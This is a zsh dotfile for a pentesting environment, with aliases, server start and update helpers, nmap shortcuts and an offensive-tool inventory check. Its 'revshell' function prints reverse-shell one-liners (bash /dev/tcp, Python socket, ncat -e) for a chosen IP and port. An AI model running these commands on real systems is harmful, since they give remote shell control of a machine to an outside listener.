# ╔══════════════════════════════════════════════════════════════╗
# ║  PURPLE BRUCE LUCY — ZSH Environment v7.0                   ║
# ║  Purple Team · Hacker · AI Agent · BlackArch                 ║
# ╚══════════════════════════════════════════════════════════════╝

# ── Oh-My-Zsh ────────────────────────────────────────────────────
export ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="powerlevel10k/powerlevel10k"
DISABLE_AUTO_UPDATE="true"
DISABLE_AUTO_TITLE="true"

plugins=(
  git
  sudo
  colored-man-pages
  extract
  zsh-autosuggestions
  zsh-syntax-highlighting
)

if [[ -f "$ZSH/oh-my-zsh.sh" ]]; then
  source "$ZSH/oh-my-zsh.sh"
  [[ -f "$HOME/.p10k.zsh" ]] && source "$HOME/.p10k.zsh"
else
  autoload -U colors && colors
  PROMPT=$'\n%F{135}⚡%f %F{51}%n@%m%f %F{240}%~%f\n%F{201}❯%f '
  [[ -f /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh ]] && \
    source /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
  [[ -f /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh ]] && \
    source /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh
fi

# ── NVM ──────────────────────────────────────────────────────────
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh"

# ── PATH ─────────────────────────────────────────────────────────
export PATH="$HOME/.local/bin:$HOME/bin:$PATH"

# ── ENVIRONMENT ──────────────────────────────────────────────────
export COLORTERM=truecolor
export TERM=xterm-256color
export EDITOR=vim
export LANG=en_US.UTF-8
printf '\e[?12;25h'

# ── COMPLETION ───────────────────────────────────────────────────
autoload -U compinit && compinit -u
zstyle ':completion:*' menu select
setopt HIST_IGNORE_DUPS SHARE_HISTORY
HISTSIZE=10000; SAVEHIST=10000; HISTFILE=~/.zsh_history

# ── SYNTAX HIGHLIGHTING COLORS ───────────────────────────────────
ZSH_HIGHLIGHT_HIGHLIGHTERS=(main)
typeset -A ZSH_HIGHLIGHT_STYLES 2>/dev/null || true
ZSH_HIGHLIGHT_STYLES[command]='fg=51'
ZSH_HIGHLIGHT_STYLES[alias]='fg=201'
ZSH_HIGHLIGHT_STYLES[builtin]='fg=220'
ZSH_HIGHLIGHT_STYLES[function]='fg=46'
ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE="fg=240"

# ╔══════════════════════════════════════════════════════════════╗
# ║  PURPLE BRUCE LUCY — ALIASES                                 ║
# ╚══════════════════════════════════════════════════════════════╝

# ── Purple Bruce server ──────────────────────────────────────────
_nr() { command netrunner "$@" 2>/dev/null || echo "[⚠] netrunner not found — run install-arch.sh first"; }
alias pb='_nr'
alias lucy='_nr'
alias purple='_nr'
alias bruce='_nr'
alias doctor='_nr doctor'
alias deck='_nr deck'
alias team='_nr team'
alias overclock='_nr overclock'
alias scan='_nr scan'

_pb_start() {
  local dir="${HOME}/purplebruce"
  [[ -d "$dir" ]] || { echo "[✘] ~/purplebruce not found"; return 1; }
  mkdir -p "${HOME}/.purplebruce"
  if command -v netrunner >/dev/null 2>&1; then
    netrunner start
  elif command -v tmux >/dev/null 2>&1; then
    tmux new-session -d -s purplebruce -x 220 -y 50 2>/dev/null || true
    tmux send-keys -t purplebruce "cd ${dir} && node server.js 2>&1 | tee ~/.purplebruce/server.log" Enter
    echo "[✔] Server started in tmux → http://127.0.0.1:3000"
    echo "    tmux attach -t purplebruce"
  else
    cd "$dir" && node server.js &
    echo "[✔] Server started → http://127.0.0.1:3000"
  fi
}
alias pbstart='_pb_start'
alias go='_pb_start'
alias pbstop='pkill -f "node server.js" 2>/dev/null && echo "[✔] Stopped." || echo "[⚠] Not running."'
alias stop='pkill -f "node server.js" 2>/dev/null && echo "[✔] Stopped." || echo "[⚠] Not running."'
alias pbrestart='pkill -f "node server.js" 2>/dev/null; sleep 1; _pb_start'
alias logs='tail -f ~/.purplebruce/audit.log 2>/dev/null || tail -f ~/purplebruce/server.log 2>/dev/null || echo "[⚠] No log — run: pbstart"'

# ── Update ───────────────────────────────────────────────────────
_pb_update() {
  local dir="${HOME}/purplebruce"
  [[ -d "$dir" ]] || { echo "[✘] ~/purplebruce not found"; return 1; }
  echo "[→] Pulling latest..."
  git -C "$dir" pull origin main || { echo "[⚠] git pull failed"; return 1; }
  echo "[→] npm install..."
  npm install --prefix "$dir" --silent
  echo "[→] Deploying dotfiles..."
  bash "${dir}/netrunner/dotfiles/install.sh"
  echo "[✔] Done — run: exec zsh"
}
alias pbupdate='_pb_update'
alias update='_pb_update'

# ── Firmware ─────────────────────────────────────────────────────
alias bruce-flash='bash "${HOME}/purplebruce/netrunner/firmware/flash-bruce.sh"'

# ── OpenClaw ─────────────────────────────────────────────────────
alias ocstart='openclaw onboard --install-daemon 2>/dev/null; openclaw dashboard &'
alias ocstop='pkill -f openclaw 2>/dev/null && echo "[✔] OpenClaw stopped"'
alias oc='openclaw'

# ── Hacking ──────────────────────────────────────────────────────
alias nse='ls /usr/share/nmap/scripts/ | grep'
alias msfq='msfconsole -q'
alias se='searchsploit'
alias myip='curl -s ifconfig.me 2>/dev/null || wget -qO- ifconfig.me 2>/dev/null || echo unknown'
alias ports='ss -tlnp'
alias listening='ss -tlnp'
alias pyhttp='python3 -m http.server'
alias toolcheck='
echo "\n  \e[38;5;135m[BlackArch Arsenal Check]\e[0m\n"
_tools=(
  "nmap:recon" "masscan:recon" "zmap:recon" "hping3:recon" "arp-scan:recon"
  "ffuf:web" "gobuster:web" "feroxbuster:web" "nikto:web" "whatweb:web"
  "nuclei:vuln" "subfinder:osint" "httpx:web" "katana:web"
  "sqlmap:exploit" "commix:exploit" "dalfox:exploit" "xsstrike:exploit"
  "theharvester:osint" "amass:osint" "recon-ng:osint" "sherlock:osint"
  "hydra:password" "hashcat:password" "john:password" "medusa:password"
  "msfconsole:exploit" "msfvenom:exploit" "searchsploit:exploit"
  "crackmapexec:windows" "evil-winrm:windows" "impacket-smbclient:windows" "kerbrute:windows"
  "bloodhound:windows" "smbmap:windows" "enum4linux:windows"
  "pwncat:post-ex" "chisel:post-ex" "ligolo-ng:post-ex" "socat:post-ex"
  "radare2:rev-eng" "gdb:rev-eng" "ropper:rev-eng"
  "wireshark:forensics" "tshark:forensics" "binwalk:forensics" "exiftool:forensics"
  "steghide:stego" "zsteg:stego" "aircrack-ng:wireless" "wifite:wireless"
)
for entry in "${_tools[@]}"; do
  t="${entry%%:*}"; c="${entry##*:}"
  if command -v "$t" >/dev/null 2>&1; then
    printf "  \e[32m✔\e[0m \e[38;5;51m%-22s\e[0m \e[38;5;240m%s\e[0m\n" "$t" "$c"
  else
    printf "  \e[31m✘\e[0m \e[38;5;240m%-22s %s\e[0m\n" "$t" "$c"
  fi
done
echo "\n  \e[38;5;240mpacman -S blackarch-<category>  or  pacman -S <toolname>\e[0m\n"
'
alias ba='pacman -Ss blackarch'
alias pac='pacman -S --noconfirm --needed'

# ── General ──────────────────────────────────────────────────────
alias ls='ls --color=auto -F'
alias ll='ls -lah --color=auto'
alias la='ls -lAh --color=auto'
alias grep='grep --color=auto'
alias ..='cd ..'
alias ...='cd ../..'
alias vi='vim'
alias c='clear'
alias cls='clear'

# ── tmux ─────────────────────────────────────────────────────────
alias t='tmux'
alias tn='tmux new -s'
alias ta='tmux attach -t'
alias tl='tmux list-sessions'
alias tk='tmux kill-session -t'

# ── Git ──────────────────────────────────────────────────────────
alias gs='git status'
alias gp='git push'
alias gl='git pull'
alias gd='git diff'
alias ga='git add'
alias gc='git commit'
alias gco='git checkout'

# ╔══════════════════════════════════════════════════════════════╗
# ║  FUNCTIONS                                                   ║
# ╚══════════════════════════════════════════════════════════════╝

nq()      { nmap -T4 -F "${1:-localhost}"; }
nfull()   { nmap -T4 -A -p- "${1:-localhost}"; }
nstealth(){ nmap -sS -T2 -p- "${1:-localhost}"; }
serve()   { python3 -m http.server "${1:-8080}"; }
b64e()    { echo -n "$1" | base64; }
b64d()    { echo -n "$1" | base64 -d; }
sha()     { echo -n "$1" | sha256sum; }

extract() {
  case "$1" in
    *.tar.gz|*.tgz) tar -xzf "$1" ;;
    *.tar.bz2)      tar -xjf "$1" ;;
    *.zip)          unzip "$1" ;;
    *.7z)           7z x "$1" ;;
    *.gz)           gunzip "$1" ;;
    *.rar)          unrar x "$1" ;;
    *)              echo "Unknown: $1" ;;
  esac
}

portcheck() { nmap -p "$1" "${2:-localhost}" 2>/dev/null | grep -E "open|closed|filtered"; }

revshell() {
  local ip="${1:-$(hostname -I | awk '{print $1}')}"
  local port="${2:-4444}"
  echo "\n[Reverse Shell One-Liners]"
  echo "  bash:    bash -i >& /dev/tcp/$ip/$port 0>&1"
  echo "  python:  python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"
  echo "  nc:      ncat $ip $port -e /bin/bash"
  echo "\n  Listener: ncat -lvnp $port"
}

# ── BANNER ───────────────────────────────────────────────────────
_pb_banner() {
  local V=$'\e[38;5;135m' C=$'\e[38;5;51m' G=$'\e[38;5;46m'
  local Y=$'\e[38;5;220m' M=$'\e[38;5;201m' D=$'\e[38;5;240m'
  local W=$'\e[1;37m' RS=$'\e[0m'

  echo ""
  echo "  ${V}╭────────────────────────────────────────────╮${RS}"
  echo "  ${V}│${RS}  ${M}⚡${RS}  ${W}PURPLE BRUCE LUCY${RS}  ${D}v7.0${RS}              ${V}│${RS}"
  echo "  ${V}│${RS}  ${D}Purple Team · AI Agent · BlackArch${RS}       ${V}│${RS}"
  echo "  ${V}│${RS}  ${D}Arch Linux proot  [LAYER 2]${RS}               ${V}│${RS}"
  echo "  ${V}╰────────────────────────────────────────────╯${RS}"
  echo ""
  echo "  ${G}⚡${RS} ${W}pbstart${RS}    ${D}→ launch server${RS}"
  echo "  ${G}⚡${RS} ${W}go${RS}         ${D}→ same (short)${RS}"
  echo "  ${C}⬡${RS} ${W}oc${RS}         ${D}→ openclaw CLI${RS}"
  echo "  ${C}⬡${RS} ${W}ocstart${RS}    ${D}→ start openclaw gateway${RS}"
  echo "  ${D}──────────────────────────────${RS}"
  echo "  ${C}toolcheck${RS}   ${D}→ verify BlackArch arsenal${RS}"
  echo "  ${C}pbupdate${RS}    ${D}→ update + redeploy${RS}"
  echo ""
}
_pb_banner
